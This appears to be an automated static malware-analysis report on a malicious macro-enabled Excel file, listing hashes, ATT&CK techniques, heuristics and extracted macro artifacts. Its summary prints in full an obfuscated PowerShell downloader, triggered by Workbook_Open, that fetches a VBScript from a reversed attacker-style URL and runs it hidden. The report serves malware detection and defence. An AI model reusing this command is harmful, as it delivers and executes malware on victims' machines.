Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 dbd9e342e9011120…

MALICIOUS

Office (OOXML) / .XLSM

208.8 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300
MD5: 43076e407fd7cb0876901d43c5f7542c SHA-1: 9e0735ea6fa0159013e3d4477eaea9f848248860 SHA-256: dbd9e342e90111207ab2ff7c47cc89a0c7cf9c580b310ce8d30a17f2722fae16
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The macro-enabled Excel file contains a Workbook_Open macro that executes a PowerShell command. This PowerShell command, when reconstructed, is 'powershell -nop -w hidden -c "$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.gof\]'+pmet:vne$,''8DuiOpq1YTd8pOA=yekhtua&74712%58868200A4928F46=diser&58868200A4928F46=dic?daolnwod/moc.evil.evirdeno//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\fog.vbs')"'. This PowerShell command downloads and executes a VBScript file named 'fog.vbs' from the reconstructed URL 'http://moc.evil.evirdeno//:ptth' into the temporary directory. The VBA code also uses CreateObject and CallByName to execute shell commands, indicating a downloader or initial execution stage.

Heuristics 6

  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/iX/1.0/
    • http://ns.adobe.com/xap/1.0/mm/

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
b8e4258cddc6e3e978c66f852d02535b47586923ee4255420df72dd2f8a091c2		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1238 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
vbaProject_00.bin
5375f6559551b5078745adb718fb1cda50e91914d85bb04a7e58c4fb36cb8b7a		 vba-project OOXML VBA project: xl/vbaProject.bin 14848 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.